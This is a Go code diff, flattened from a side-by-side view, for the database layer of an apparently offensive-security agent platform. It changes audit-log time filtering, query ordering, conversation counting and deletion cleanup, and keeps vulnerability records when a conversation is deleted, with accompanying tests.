ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // default: os temp + conversation id ReductionRootDir string `yaml:"reduction_root_dir,omitempty" json:"reduction_root_dir,omitempty"` // 非空:落盘根目录(默认 tmp/reduction);其下按 projects/{id} 或 conversations/{id} 隔离
ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000 ReductionMaxLengthForTrunc int `yaml:"reduction_max_length_for_trunc,omitempty" json:"reduction_max_length_for_trunc,omitempty"` // default 12000
ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000 ReductionMaxTokensForClear int `yaml:"reduction_max_tokens_for_clear,omitempty" json:"reduction_max_tokens_for_clear,omitempty"` // default 50000
ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"` ReductionClearExclude []string `yaml:"reduction_clear_exclude,omitempty" json:"reduction_clear_exclude,omitempty"`
@@ -240,6 +240,8 @@ type MultiAgentEinoMiddlewareConfig struct {
SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"` SummarizationTriggerRatio float64 `yaml:"summarization_trigger_ratio,omitempty" json:"summarization_trigger_ratio,omitempty"`
// SummarizationEmitInternalEvents controls middleware internal event emission (default true). // SummarizationEmitInternalEvents controls middleware internal event emission (default true).
SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"` SummarizationEmitInternalEvents *bool `yaml:"summarization_emit_internal_events,omitempty" json:"summarization_emit_internal_events,omitempty"`
// SummarizationRetryMaxAttempts is extra retries after the first summarization Generate attempt; 0 = default 3.
SummarizationRetryMaxAttempts int `yaml:"summarization_retry_max_attempts,omitempty" json:"summarization_retry_max_attempts,omitempty"`
// PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35). // PlanExecuteUserInputBudgetRatio caps planner/replanner/executor userInput prompt budget ratio (default 0.35).
PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"` PlanExecuteUserInputBudgetRatio float64 `yaml:"plan_execute_user_input_budget_ratio,omitempty" json:"plan_execute_user_input_budget_ratio,omitempty"`
// PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2). // PlanExecuteExecutedStepsBudgetRatio caps executed_steps prompt budget ratio (default 0.2).
@@ -591,10 +593,8 @@ type DatabaseConfig struct {
} }
type AgentConfig struct { type AgentConfig struct {
MaxIterations int `yaml:"max_iterations" json:"max_iterations"` MaxIterations int `yaml:"max_iterations" json:"max_iterations"`
LargeResultThreshold int `yaml:"large_result_threshold" json:"large_result_threshold"` // 大结果阈值(字节),默认50KB ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
ResultStorageDir string `yaml:"result_storage_dir" json:"result_storage_dir"` // 结果存储目录,默认tmp
ToolTimeoutMinutes int `yaml:"tool_timeout_minutes" json:"tool_timeout_minutes"` // 单次工具执行最大时长(分钟),超时自动终止,防止长时间挂起;0 表示不限制(不推荐)
// SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。 // SystemPromptPath 单代理系统提示 Markdown/文本文件路径(相对 config.yaml 所在目录,或可写绝对路径)。非空且可读时替换内置单代理提示;留空用内置。
SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"` SystemPromptPath string `yaml:"system_prompt_path,omitempty" json:"system_prompt_path,omitempty"`
} }
+2 -2
View File
@@ -77,7 +77,7 @@ func (db *DB) LoadAttackChainNodes(conversationID string) ([]AttackChainNode, er
SELECT id, node_type, node_name, tool_execution_id, metadata, risk_score SELECT id, node_type, node_name, tool_execution_id, metadata, risk_score
FROM attack_chain_nodes FROM attack_chain_nodes
WHERE conversation_id = ? WHERE conversation_id = ?
ORDER BY created_at ASC ORDER BY created_at ASC, rowid ASC
` `
rows, err := db.Query(query, conversationID) rows, err := db.Query(query, conversationID)
@@ -123,7 +123,7 @@ func (db *DB) LoadAttackChainEdges(conversationID string) ([]AttackChainEdge, er
SELECT id, source_node_id, target_node_id, edge_type, weight SELECT id, source_node_id, target_node_id, edge_type, weight
FROM attack_chain_edges FROM attack_chain_edges
WHERE conversation_id = ? WHERE conversation_id = ?
ORDER BY created_at ASC ORDER BY created_at ASC, rowid ASC
` `
rows, err := db.Query(query, conversationID) rows, err := db.Query(query, conversationID)
+9 -7
View File
@@ -69,12 +69,12 @@ func buildAuditLogsWhere(filter ListAuditLogsFilter) (string, []interface{}) {
args = append(args, filter.ResourceID) args = append(args, filter.ResourceID)
} }
if filter.Since != nil { if filter.Since != nil {
conditions = append(conditions, "created_at >= ?") conditions = append(conditions, sqliteEpochGE("created_at", ">="))
args = append(args, *filter.Since) args = append(args, formatSQLiteUTC(*filter.Since))
} }
if filter.Until != nil { if filter.Until != nil {
conditions = append(conditions, "created_at <= ?") conditions = append(conditions, sqliteEpochGE("created_at", "<="))
args = append(args, *filter.Until) args = append(args, formatSQLiteUTC(*filter.Until))
} }
if q := strings.TrimSpace(filter.Query); q != "" { if q := strings.TrimSpace(filter.Query); q != "" {
like := "%" + q + "%" like := "%" + q + "%"
@@ -93,7 +93,9 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
return errors.New("audit id is required") return errors.New("audit id is required")
} }
if row.CreatedAt.IsZero() { if row.CreatedAt.IsZero() {
row.CreatedAt = time.Now() row.CreatedAt = time.Now().UTC()
} else {
row.CreatedAt = row.CreatedAt.UTC()
} }
if strings.TrimSpace(row.Level) == "" { if strings.TrimSpace(row.Level) == "" {
row.Level = "info" row.Level = "info"
@@ -111,7 +113,7 @@ func (db *DB) AppendAuditLog(row *AuditLog) error {
) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
` `
_, err := db.Exec(query, _, err := db.Exec(query,
row.ID, row.CreatedAt, row.Level, row.Category, row.Action, row.Result, row.ID, formatSQLiteUTC(row.CreatedAt), row.Level, row.Category, row.Action, row.Result,
row.Actor, row.SessionHint, row.ClientIP, row.UserAgent, row.Actor, row.SessionHint, row.ClientIP, row.UserAgent,
row.ResourceType, row.ResourceID, row.Message, detailJSON, row.ResourceType, row.ResourceID, row.Message, detailJSON,
) )
@@ -202,7 +204,7 @@ func (db *DB) ListAuditLogs(filter ListAuditLogsFilter) ([]*AuditLog, error) {
// DeleteAuditLogsBefore removes rows older than cutoff. // DeleteAuditLogsBefore removes rows older than cutoff.
func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) { func (db *DB) DeleteAuditLogsBefore(cutoff time.Time) (int64, error) {
res, err := db.Exec(`DELETE FROM audit_logs WHERE created_at < ?`, cutoff) res, err := db.Exec(`DELETE FROM audit_logs WHERE `+sqliteEpochGE("created_at", "<"), formatSQLiteUTC(cutoff))
if err != nil { if err != nil {
return 0, err return 0, err
} }
+62
View File
@@ -0,0 +1,62 @@
package database
import (
"os"
"path/filepath"
"strings"
"testing"
"time"
"go.uber.org/zap"
)
func TestBuildAuditLogsWhere_timeFilterSQL(t *testing.T) {
since := time.Date(2026, 6, 16, 17, 2, 0, 0, time.UTC)
until := time.Date(2026, 6, 17, 3, 3, 0, 0, time.UTC)
where, args := buildAuditLogsWhere(ListAuditLogsFilter{Since: &since, Until: &until})
if !strings.Contains(where, "strftime('%s', created_at) >=") {
t.Fatalf("expected epoch comparison for since, got %q", where)
}
if !strings.Contains(where, "strftime('%s', created_at) <=") {
t.Fatalf("expected epoch comparison for until, got %q", where)
}
if len(args) != 2 {
t.Fatalf("expected 2 time args, got %d", len(args))
}
for i, arg := range args {
s, ok := arg.(string)
if !ok || s == "" {
t.Fatalf("arg %d: want non-empty UTC RFC3339 string, got %v", i, arg)
}
}
}
func TestListAuditLogs_timeFilterMixedStorageFormats(t *testing.T) {
root, err := os.Getwd()
if err != nil {
t.Skip(err)
}
dbPath := filepath.Join(root, "..", "..", "data", "conversations.db")
if _, err := os.Stat(dbPath); err != nil {
t.Skip("conversations.db not found")
}
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatal(err)
}
defer db.Close()
since, _ := ParseRFC3339Time("2026-06-16T17:02:00Z")
until, _ := ParseRFC3339Time("2026-06-17T03:03:00Z")
filter := ListAuditLogsFilter{Since: &since, Until: &until, Limit: 50}
logs, err := db.ListAuditLogs(filter)
if err != nil {
t.Fatal(err)
}
for _, row := range logs {
at := row.CreatedAt.UTC()
if at.Before(since) || at.After(until) {
t.Fatalf("log %s at %s outside [%s, %s]", row.ID, at, since, until)
}
}
}
+1 -1
View File
@@ -239,7 +239,7 @@ func (db *DB) CountBatchQueues(status, keyword string) (int, error) {
// GetBatchTasks 获取批量任务队列的所有任务 // GetBatchTasks 获取批量任务队列的所有任务
func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) { func (db *DB) GetBatchTasks(queueID string) ([]*BatchTaskRow, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY id", "SELECT id, queue_id, message, conversation_id, status, started_at, completed_at, error, result FROM batch_tasks WHERE queue_id = ? ORDER BY rowid ASC",
queueID, queueID,
) )
if err != nil { if err != nil {
+1 -1
View File
@@ -840,7 +840,7 @@ func (db *DB) PopQueuedC2Tasks(sessionID string, limit int) ([]*C2Task, error) {
created_at created_at
FROM c2_tasks FROM c2_tasks
WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved')) WHERE session_id = ? AND (status = 'queued' AND (approval_status = '' OR approval_status = 'approved'))
ORDER BY created_at ASC ORDER BY created_at ASC, rowid ASC
LIMIT ? LIMIT ?
` `
rows, err := tx.Query(query, sessionID, limit) rows, err := tx.Query(query, sessionID, limit)
+147 -15
View File
@@ -361,6 +361,27 @@ func (db *DB) GetConversationLite(id string) (*Conversation, error) {
return &conv, nil return &conv, nil
} }
// CountConversations 统计对话数量。
func (db *DB) CountConversations(search string) (int, error) {
var count int
var err error
if search != "" {
searchPattern := "%" + search + "%"
err = db.QueryRow(
`SELECT COUNT(*) FROM conversations c
WHERE c.title LIKE ?
OR EXISTS (SELECT 1 FROM messages m WHERE m.conversation_id = c.id AND m.content LIKE ?)`,
searchPattern, searchPattern,
).Scan(&count)
} else {
err = db.QueryRow(`SELECT COUNT(*) FROM conversations`).Scan(&count)
}
if err != nil {
return 0, fmt.Errorf("统计对话失败: %w", err)
}
return count, nil
}
// ListConversations 列出所有对话 // ListConversations 列出所有对话
func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) { func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversation, error) {
var rows *sql.Rows var rows *sql.Rows
@@ -430,6 +451,73 @@ func (db *DB) ListConversations(limit, offset int, search string) ([]*Conversati
return conversations, nil return conversations, nil
} }
const ungroupedConversationsSQL = `
FROM conversations c
WHERE NOT EXISTS (
SELECT 1 FROM conversation_group_mappings cgm WHERE cgm.conversation_id = c.id
)`
// CountUngroupedConversations 统计不在任何分组中的对话数量。
func (db *DB) CountUngroupedConversations() (int, error) {
var count int
if err := db.QueryRow(`SELECT COUNT(*) ` + ungroupedConversationsSQL).Scan(&count); err != nil {
return 0, fmt.Errorf("统计未分组对话失败: %w", err)
}
return count, nil
}
// ListUngroupedConversations 列出不在任何分组中的对话(最近对话侧栏)。
func (db *DB) ListUngroupedConversations(limit, offset int) ([]*Conversation, error) {
rows, err := db.Query(
`SELECT c.id, c.title, COALESCE(c.pinned, 0), c.created_at, c.updated_at, c.project_id `+
ungroupedConversationsSQL+`
ORDER BY c.updated_at DESC
LIMIT ? OFFSET ?`,
limit, offset,
)
if err != nil {
return nil, fmt.Errorf("查询未分组对话失败: %w", err)
}
defer rows.Close()
var conversations []*Conversation
for rows.Next() {
var conv Conversation
var createdAt, updatedAt string
var pinned int
var projectID sql.NullString
if err := rows.Scan(&conv.ID, &conv.Title, &pinned, &createdAt, &updatedAt, &projectID); err != nil {
return nil, fmt.Errorf("扫描对话失败: %w", err)
}
if projectID.Valid {
conv.ProjectID = strings.TrimSpace(projectID.String)
}
var err1, err2 error
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
if err1 != nil {
conv.CreatedAt, err1 = time.Parse("2006-01-02 15:04:05", createdAt)
}
if err1 != nil {
conv.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
}
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt)
if err2 != nil {
conv.UpdatedAt, err2 = time.Parse("2006-01-02 15:04:05", updatedAt)
}
if err2 != nil {
conv.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt)
}
conv.Pinned = pinned != 0
conversations = append(conversations, &conv)
}
return conversations, rows.Err()
}
// UpdateConversationTitle 更新对话标题 // UpdateConversationTitle 更新对话标题
func (db *DB) UpdateConversationTitle(id, title string) error { func (db *DB) UpdateConversationTitle(id, title string) error {
// 注意:不更新 updated_at,因为重命名操作不应该改变对话的更新时间 // 注意:不更新 updated_at,因为重命名操作不应该改变对话的更新时间
@@ -455,18 +543,28 @@ func (db *DB) UpdateConversationTime(id string) error {
return nil return nil
} }
// DeleteConversation 删除对话及其所有相关数据 // DeleteConversation 删除对话及其会话相关数据
// 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除: // 由于数据库外键约束设置了 ON DELETE CASCADE,删除对话时会自动删除:
// - messages(消息) // - messages(消息)
// - process_details(过程详情) // - process_details(过程详情)
// - attack_chain_nodes(攻击链节点) // - attack_chain_nodes(攻击链节点)
// - attack_chain_edges(攻击链边) // - attack_chain_edges(攻击链边)
// - vulnerabilities(漏洞)
// - conversation_group_mappings(分组映射) // - conversation_group_mappings(分组映射)
// 注意:knowledge_retrieval_logs 使用 ON DELETE SET NULL,记录会保留但 conversation_id 会被设为 NULL // 漏洞记录会保留:vulnerabilities.conversation_id 使用 ON DELETE SET NULL,仅解除与会话的关联。
// 注意:knowledge_retrieval_logs 在删除前会被显式清理。
func (db *DB) DeleteConversation(id string) error { func (db *DB) DeleteConversation(id string) error {
// 删除对话前补全漏洞来源标签,便于在漏洞库中追溯已删除会话的发现。
_, err := db.Exec(`
UPDATE vulnerabilities
SET conversation_tag = COALESCE(NULLIF(TRIM(conversation_tag), ''), (SELECT title FROM conversations WHERE id = ?))
WHERE conversation_id = ?
`, id, id)
if err != nil {
db.logger.Warn("更新漏洞来源标签失败", zap.String("conversationId", id), zap.Error(err))
}
// 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除) // 显式删除知识检索日志(虽然外键是SET NULL,但为了彻底清理,我们手动删除)
_, err := db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id) _, err = db.Exec("DELETE FROM knowledge_retrieval_logs WHERE conversation_id = ?", id)
if err != nil { if err != nil {
db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err)) db.logger.Warn("删除知识检索日志失败", zap.String("conversationId", id), zap.Error(err))
// 不返回错误,继续删除对话 // 不返回错误,继续删除对话
@@ -477,17 +575,51 @@ func (db *DB) DeleteConversation(id string) error {
if err != nil { if err != nil {
return fmt.Errorf("删除对话失败: %w", err) return fmt.Errorf("删除对话失败: %w", err)
} }
// Best-effort cleanup for conversation-scoped filesystem artifacts db.removeConversationScopedDirs(id)
// (e.g., summarization transcript, reduction/checkpoint files under conversation_artifacts/<id>).
if base := strings.TrimSpace(db.conversationArtifactsDir); base != "" { db.logger.Info("对话已删除(漏洞记录已保留)", zap.String("conversationId", id))
artDir := filepath.Join(base, id) return nil
if rmErr := os.RemoveAll(artDir); rmErr != nil { }
db.logger.Warn("删除会话 artifacts 目录失败", zap.String("conversationId", id), zap.String("dir", artDir), zap.Error(rmErr))
func sanitizeConversationPathSegment(s string) string {
s = strings.TrimSpace(s)
if s == "" {
return "default"
}
s = strings.ReplaceAll(s, string(filepath.Separator), "-")
s = strings.ReplaceAll(s, "/", "-")
s = strings.ReplaceAll(s, "\\", "-")
s = strings.ReplaceAll(s, "..", "__")
if len(s) > 180 {
s = s[:180]
}
return s
}
func (db *DB) removeConversationScopedDir(base, conversationID, label string) {
base = strings.TrimSpace(base)
if base == "" {
return
}
dir := filepath.Join(base, sanitizeConversationPathSegment(conversationID))
if rmErr := os.RemoveAll(dir); rmErr != nil {
if db.logger != nil {
db.logger.Warn("删除会话目录失败",
zap.String("conversationId", conversationID),
zap.String("kind", label),
zap.String("dir", dir),
zap.Error(rmErr))
} }
} }
}
db.logger.Info("对话及其所有相关数据已删除", zap.String("conversationId", id)) func (db *DB) removeConversationScopedDirs(conversationID string) {
return nil // summarization transcript, reduction files, etc.
db.removeConversationScopedDir(db.conversationArtifactsDir, conversationID, "conversation_artifacts")
// Eino plantask JSON boards (skills_dir/.eino/plantask/<id>/).
db.removeConversationScopedDir(db.einoPlantaskBaseDir, conversationID, "plantask")
// Eino ADK runner checkpoints (checkpoint_dir/<id>/).
db.removeConversationScopedDir(db.einoCheckpointBaseDir, conversationID, "eino_checkpoint")
} }
// SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。 // SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。
@@ -604,7 +736,7 @@ func (db *DB) UpdateAssistantMessageFinalize(messageID, content string, mcpExecu
// GetMessages 获取对话的所有消息 // GetMessages 获取对话的所有消息
func (db *DB) GetMessages(conversationID string) ([]Message, error) { func (db *DB) GetMessages(conversationID string) ([]Message, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC", "SELECT id, conversation_id, role, content, reasoning_content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
conversationID, conversationID,
) )
if err != nil { if err != nil {
@@ -799,7 +931,7 @@ func (db *DB) AddProcessDetail(messageID, conversationID, eventType, message str
// GetProcessDetails 获取消息的过程详情 // GetProcessDetails 获取消息的过程详情
func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) { func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC", "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC",
messageID, messageID,
) )
if err != nil { if err != nil {
@@ -835,7 +967,7 @@ func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
// GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组) // GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组)
func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) { func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) {
rows, err := db.Query( rows, err := db.Query(
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE conversation_id = ? ORDER BY created_at ASC", "SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
conversationID, conversationID,
) )
if err != nil { if err != nil {
@@ -0,0 +1,57 @@
package database
import (
"os"
"path/filepath"
"testing"
"go.uber.org/zap"
)
func TestDeleteConversationRemovesEinoScopedDirs(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "conversations.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
plantaskBase := filepath.Join(tmp, "skills", ".eino", "plantask")
checkpointBase := filepath.Join(tmp, "eino-checkpoints")
db.SetEinoConversationDirs(plantaskBase, checkpointBase)
conv, err := db.CreateConversation("cleanup test", ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
convID := conv.ID
seg := sanitizeConversationPathSegment(convID)
for _, base := range []struct {
root string
file string
}{
{db.conversationArtifactsDir, "transcript.txt"},
{plantaskBase, "task-1.json"},
{checkpointBase, "runner-deep.ckpt"},
} {
dir := filepath.Join(base.root, seg)
if err := os.MkdirAll(dir, 0o755); err != nil {
t.Fatalf("mkdir %s: %v", dir, err)
}
if err := os.WriteFile(filepath.Join(dir, base.file), []byte("x"), 0o644); err != nil {
t.Fatalf("write %s: %v", base.file, err)
}
}
if err := db.DeleteConversation(convID); err != nil {
t.Fatalf("DeleteConversation: %v", err)
}
for _, base := range []string{db.conversationArtifactsDir, plantaskBase, checkpointBase} {
dir := filepath.Join(base, seg)
if _, statErr := os.Stat(dir); !os.IsNotExist(statErr) {
t.Fatalf("expected removed dir %s, stat err=%v", dir, statErr)
}
}
}
@@ -0,0 +1,69 @@
package database
import (
"path/filepath"
"testing"
"go.uber.org/zap"
)
func TestDeleteConversationPreservesVulnerabilities(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-preserve.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
conv, err := db.CreateConversation("vuln source chat", ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
vuln, err := db.CreateVulnerability(&Vulnerability{
ConversationID: conv.ID,
Title: "SQL Injection",
Severity: "high",
Status: "open",
})
if err != nil {
t.Fatalf("CreateVulnerability: %v", err)
}
if err := db.DeleteConversation(conv.ID); err != nil {
t.Fatalf("DeleteConversation: %v", err)
}
got, err := db.GetVulnerability(vuln.ID)
if err != nil {
t.Fatalf("GetVulnerability after delete: %v", err)
}
if got.Title != "SQL Injection" {
t.Fatalf("title = %q, want SQL Injection", got.Title)
}
if got.ConversationID != "" {
t.Fatalf("conversation_id = %q, want empty after conversation delete", got.ConversationID)
}
if got.ConversationTag != "vuln source chat" {
t.Fatalf("conversation_tag = %q, want vuln source chat", got.ConversationTag)
}
}
func TestMigrateVulnerabilitiesConversationFK(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-fk-migrate.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
if err != nil {
t.Fatalf("vulnerabilitiesConversationFKOnDeleteSetNull: %v", err)
}
if !ok {
t.Fatal("expected vulnerabilities.conversation_id FK to use ON DELETE SET NULL")
}
}
+131 -52
View File
@@ -49,6 +49,8 @@ type DB struct {
*sql.DB *sql.DB
logger *zap.Logger logger *zap.Logger
conversationArtifactsDir string conversationArtifactsDir string
einoPlantaskBaseDir string // skills_dir + plantask_rel_dir (per-conversation subdirs)
einoCheckpointBaseDir string // checkpoint_dir root (per-conversation subdirs)
checkpointLoopName string checkpointLoopName string
checkpointStop chan struct{} checkpointStop chan struct{}
checkpointDone chan struct{} checkpointDone chan struct{}
@@ -155,6 +157,16 @@ func NewDB(dbPath string, logger *zap.Logger) (*DB, error) {
return database, nil return database, nil
} }
// SetEinoConversationDirs configures best-effort filesystem cleanup on DeleteConversation.
// plantaskBase is skills_root/plantask_rel (no conversation id); checkpointBase is checkpoint_dir root.
func (db *DB) SetEinoConversationDirs(plantaskBase, checkpointBase string) {
if db == nil {
return
}
db.einoPlantaskBaseDir = strings.TrimSpace(plantaskBase)
db.einoCheckpointBaseDir = strings.TrimSpace(checkpointBase)
}
// initTables 初始化数据库表 // initTables 初始化数据库表
func (db *DB) initTables() error { func (db *DB) initTables() error {
// 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库) // 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库)
@@ -334,7 +346,6 @@ func (db *DB) initTables() error {
source_conversation_id TEXT, source_conversation_id TEXT,
source_message_id TEXT, source_message_id TEXT,
pinned INTEGER NOT NULL DEFAULT 0, pinned INTEGER NOT NULL DEFAULT 0,
supersedes_fact_id TEXT,
related_vulnerability_id TEXT, related_vulnerability_id TEXT,
created_at DATETIME NOT NULL, created_at DATETIME NOT NULL,
updated_at DATETIME NOT NULL, updated_at DATETIME NOT NULL,
@@ -342,30 +353,11 @@ func (db *DB) initTables() error {
UNIQUE(project_id, fact_key) UNIQUE(project_id, fact_key)
);` );`
createProjectFactVersionsTable := `
CREATE TABLE IF NOT EXISTS project_fact_versions (
id TEXT PRIMARY KEY,
fact_id TEXT NOT NULL,
project_id TEXT NOT NULL,
fact_key TEXT NOT NULL,
category TEXT NOT NULL DEFAULT 'note',
summary TEXT NOT NULL DEFAULT '',
body TEXT,
confidence TEXT NOT NULL DEFAULT 'tentative',
source_conversation_id TEXT,
source_message_id TEXT,
pinned INTEGER NOT NULL DEFAULT 0,
related_vulnerability_id TEXT,
archived_at DATETIME NOT NULL,
FOREIGN KEY (fact_id) REFERENCES project_facts(id) ON DELETE CASCADE,
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE
);`
// 创建漏洞表 // 创建漏洞表
createVulnerabilitiesTable := ` createVulnerabilitiesTable := `
CREATE TABLE IF NOT EXISTS vulnerabilities ( CREATE TABLE IF NOT EXISTS vulnerabilities (
id TEXT PRIMARY KEY, id TEXT PRIMARY KEY,
conversation_id TEXT NOT NULL, conversation_id TEXT,
conversation_tag TEXT, conversation_tag TEXT,
task_tag TEXT, task_tag TEXT,
title TEXT NOT NULL, title TEXT NOT NULL,
@@ -379,7 +371,8 @@ func (db *DB) initTables() error {
recommendation TEXT, recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);` );`
// 创建批量任务队列表 // 创建批量任务队列表
@@ -598,7 +591,6 @@ func (db *DB) initTables() error {
CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id); CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id);
CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence); CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence);
CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id); CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id);
CREATE INDEX IF NOT EXISTS idx_project_fact_versions_fact_id ON project_fact_versions(fact_id);
CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id); CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id);
CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id); CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id);
@@ -680,10 +672,6 @@ func (db *DB) initTables() error {
return fmt.Errorf("创建project_facts表失败: %w", err) return fmt.Errorf("创建project_facts表失败: %w", err)
} }
if _, err := db.Exec(createProjectFactVersionsTable); err != nil {
return fmt.Errorf("创建project_fact_versions表失败: %w", err)
}
if _, err := db.Exec(createVulnerabilitiesTable); err != nil { if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
return fmt.Errorf("创建vulnerabilities表失败: %w", err) return fmt.Errorf("创建vulnerabilities表失败: %w", err)
} }
@@ -750,12 +738,15 @@ func (db *DB) initTables() error {
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err)) db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
// 不返回错误,允许继续运行 // 不返回错误,允许继续运行
} }
if err := db.migrateVulnerabilitiesConversationFK(); err != nil {
db.logger.Warn("迁移vulnerabilities会话外键失败", zap.Error(err))
}
if err := db.migrateProjectsTable(); err != nil { if err := db.migrateProjectsTable(); err != nil {
db.logger.Warn("迁移projects相关表失败", zap.Error(err)) db.logger.Warn("迁移projects相关表失败", zap.Error(err))
} }
if err := db.migrateProjectFactVersionsTable(); err != nil { if err := db.dropProjectFactVersionsTable(); err != nil {
db.logger.Warn("迁移project_fact_versions表失败", zap.Error(err)) db.logger.Warn("清理project_fact_versions表失败", zap.Error(err))
} }
if err := db.migrateWebshellConnectionsTable(); err != nil { if err := db.migrateWebshellConnectionsTable(); err != nil {
@@ -1153,34 +1144,122 @@ func (db *DB) migrateProjectsTable() error {
return nil return nil
} }
// migrateProjectFactVersionsTable 为已有库创建事实版本表。 // dropProjectFactVersionsTable 移除已废弃的事实版本归档表。
func (db *DB) migrateProjectFactVersionsTable() error { func (db *DB) dropProjectFactVersionsTable() error {
